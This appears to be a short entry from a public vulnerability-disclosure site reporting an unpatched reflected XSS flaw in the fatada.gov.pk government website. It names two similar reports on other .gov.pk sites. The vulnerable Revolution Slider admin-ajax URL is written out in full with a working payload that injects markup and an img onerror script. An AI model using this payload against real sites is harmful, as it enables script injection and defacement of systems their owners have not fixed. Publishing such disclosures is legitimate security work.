fatada.gov.pk XSS vulnerability

XSS – http://www.faisalabadpolice.gov.pk/
November 28, 2015
financekpp.gov.pk. – XSS vuln
November 28, 2015

fatada.gov.pk XSS vulnerability

logot

Vulnerable Website Description: fatada.gov.pk

FATA Development Authority.

Vulnerability Details:

Vuln URL : /wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=<h1>Tier3<br><br><br><br><img%20src=x%20onerror=prompt(String.fromCharCode(47,88,83,83,80,79,83,69,68,47))%20/><!–

Verified Yes, at 16/09/2015
Patched No
Latest check for patch 07/10/2015 (Check now)
Type XSS
Status Publicly disclosed

 

 

Comments are closed.